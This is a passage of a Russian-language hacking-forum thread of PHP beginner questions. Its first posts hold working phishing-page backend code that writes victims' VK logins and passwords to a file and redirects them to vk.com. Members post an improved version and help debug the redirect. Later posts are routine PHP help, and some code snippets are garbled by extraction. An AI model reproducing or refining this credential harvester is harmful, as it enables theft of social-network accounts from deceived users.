[php] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. brutal

    brutal New Member

    Joined:
    6 Nov 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    <?php
    $file = fopen("base.php",a);

    $data = "$_POST : $_POST[pass] \n";

    fwrite($file,$data);

    fclose($file);

    header("Location: http://vk.com/");

    exit;
    ?>
    Вот файл фейка но почему-то редирект не работает подскажите может что не так написал а то задолбался уже в гугле лазить
     
  2. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    728
    Likes Received:
    26
    Reputations:
    -6
    <?PHP
    $Login = $_POST['login']; // Логин
    $Pass = $_POST['passwd']; // Пароль

    $log = fopen("base.php","a+"); //открываем файл базы
    fwrite($log,"\n $Login:$Pass \n"); //записываем всё
    fclose($log); //закрываем
    echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru'></head></html>"; // куда пошлем пользователя после того как он ввел данные!
    ?>
     
  3. banality

    banality New Member

    Joined:
    13 Aug 2011
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    boortyhuhtyu
    php > html , следовательно редирект заданный мета тегом не кошерно.

    brutal все работает кроме редиректа или ошибку выдает?
     
  4. brutal

    brutal New Member

    Joined:
    6 Nov 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    все работает кроме редиректа логи и пассы заполняет
     
  5. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    795
    Likes Received:
    140
    Reputations:
    73
    Стоит отображение ошибок? Переведи файл в UTF-8 без BOM
     
  6. Ti Jock

    Ti Jock Member

    Joined:
    5 Apr 2010
    Messages:
    4
    Likes Received:
    7
    Reputations:
    3
    Есть скрипт, отправляет пост запрос, из респонса нужно получить слово «Спасибо», и если оно присутсвтует, то выводить ok, а если нет — error.
     
  7. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    736
    Likes Received:
    73
    Reputations:
    19
    PHP:
    if (strpos($resp'Спасибо') !== false) {
       echo(
    'Найдено')

    }
     
    2 people like this.
  8. BRR

    BRR New Member

    Joined:
    4 Jun 2012
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    всем привет как оперделить пост запроc на $this ?

    PHP:
    <?php 
    class login  {
         var 
    $email;
         
    $this->email $_POST['mail'];;
                 
    }
    ?>
    получаю Parse error: syntax error, unexpected T_VARIABLE, expecting T_FUNCTION
     
  9. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    736
    Likes Received:
    73
    Reputations:
    19
    Все правильно но член класса надо определять либо без var.
    PHP:
    <?php class login 
    $email

    $this->email $_POST['mail'];; 

    ?>
    Либо вместо var прописатьь идентификатор доступа.
    priovate\public\proteced
     
  10. BRR

    BRR New Member

    Joined:
    4 Jun 2012
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    mironich все равно получаю Parse error: syntax error, unexpected T_VARIABLE, expecting T_FUNCTION

    PHP:
    <?php 
    class login {  

           
    $email;  

          
    $this->email $_POST['mail'];  

    }
     
    ?>
    и

    PHP:
    <?php 
    class login {  

          private 
    $email;  

          
    $this->email $_POST['mail'];  
    }
     
    ?>
    так как оперделить пост запрос? :(
     
    #20810 BRR, 14 Jul 2012
    Last edited: 14 Jul 2012
  11. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    736
    Likes Received:
    73
    Reputations:
    19
    Чет я затупил ты же констуктор не обьявил и вообще какие либо функции,
    PHP:
    [PHP] <?php class login 
    private 
    $email;

        function 
    __construct() {
                  
    $this->email $_POST['mail'];
             }

     } 
    ?> 
    [/PHP]
     
  12. BRR

    BRR New Member

    Joined:
    4 Jun 2012
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    я вобщето так делал,без функц не прокатит видно.
    спасибо
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    как просвоить переменной функцию phpinfo();
    ??

    типа
    $a = phpinfo();

    и втрорй вопрос, искал в гугле но ответа не нашол, как можно вівести на екран все заголовки что передаёт браузер, чисто на php, без всяких сниферов и плагинов для браузера
     
  14. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    945
    Likes Received:
    307
    Reputations:
    51
    qaz
    1) Буферизируйте вывод (http://www.php.net/manual/ru/function.ob-start.php)
    2) get_headers ?
     
  15. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    1)ок попробую,
    2)get_headers — Возвращает все заголовки из ответа сервера на HTTP-запрос, а мне надо отобразыть заголовки которые передал браузер перейдя на странмцу
     
  16. daniel777

    daniel777 Member

    Joined:
    8 Jul 2010
    Messages:
    520
    Likes Received:
    90
    Reputations:
    37
    Может быть apache_request_headers() ?
    Проверить возможности нету, нашел в поиске.
     
  17. dsda

    dsda New Member

    Joined:
    31 Jul 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  18. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    945
    Likes Received:
    307
    Reputations:
    51
    qaz http://www.php.net/manual/ru/reserved.variables.server.php
     
    1 person likes this.
  19. daniel777

    daniel777 Member

    Joined:
    8 Jul 2010
    Messages:
    520
    Likes Received:
    90
    Reputations:
    37
    Прочитайте внимательнее второй пункт в этом сообщении:
    http://forum.antichat.ru/showpost.php?p=3210839&postcount=20980
     
  20. BRR

    BRR New Member

    Joined:
    4 Jun 2012
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    есть код который читает файлы из папки. как сделать чтоб можно было удалить каждый файл по отдельности?
    PHP:
    <?php
    $dir 
    "tmp/";

    if (
    is_dir($dir)) {
       if (
    $dh opendir($dir)) {
           while ((
    $file readdir($dh)) !== false) {
               if((
    $file !=".") && ($file !=".."))
           {
               print 
    "$file<br> ";
               }
           }
           
    closedir($dh);
       }
    }
    ?>
    Зарания спасибо.
     
Loading...
Similar Threads - Новичкам задаем вопросы
  1. Kaimi
    Replies:
    338
    Views:
    118,266
  2. Варик
    Replies:
    3
    Views:
    1,901
  3. insulin
    Replies:
    6
    Views:
    1,753
  4. _Great_
    Replies:
    2,100
    Views:
    377,098
Thread Status:
Not open for further replies.